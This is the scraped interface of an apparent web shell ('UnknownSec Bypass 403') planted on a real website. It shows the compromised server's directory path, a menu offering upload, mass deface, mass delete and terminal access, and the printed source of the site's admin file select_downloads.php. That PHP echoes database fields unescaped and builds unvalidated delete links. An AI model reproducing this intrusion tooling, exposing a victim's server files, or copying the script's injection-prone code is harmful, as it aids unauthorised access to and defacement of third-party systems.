UnknownSec Bypass
403
:
/
var
/
www
/
santgyaneshwarji
/
cpanel
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
select_downloads.php
<?php include "../config.php"; $sql="select * from downloadstb"; $result = mysqli_query($conn,$sql); echo '<thead> <tr> <th style="width:20px;"> S.No. </th> <th>File Title</th> <th style="width:30px;">Type</th> <th style="width:30px;"></th> <th style="width:30px;"></th> </tr> </thead>'; echo '<tbody>'; $i=1; while($data=mysqli_fetch_array($result)) { echo ' <tr> <td>'.$i.'</td> <td>'.$data['downloadstitle'].'</td>'; if($data['file_extention']=="pdf" || $data['file_extention']=="doc"){ echo '<td> <i class="glyphicon glyphicon-list-alt" alt="pdf"></i> </td>'; } if($data['file_extention']=="jpg" || $data['file_extention']=="jepg" || $data['file_extention']=="png" || $data['file_extention']=="gif"){ echo '<td> <i class="glyphicon glyphicon-picture" alt="image"></i> </td>'; } echo' <td> <a href="downloads/'.$data['file_name'].'" target="_blank"><i class="glyphicon glyphicon-download-alt"></i></a> </td> <td> <a href="delete_downloads.php?edit_id='.$data['id'].' & file_name='.$data['file_name'].'"><i class="glyphicon glyphicon-trash"></i></a> </td> </tr>'; $i++; } echo '</tbody>'; ?>
Copyright © 2025 - UnknownSec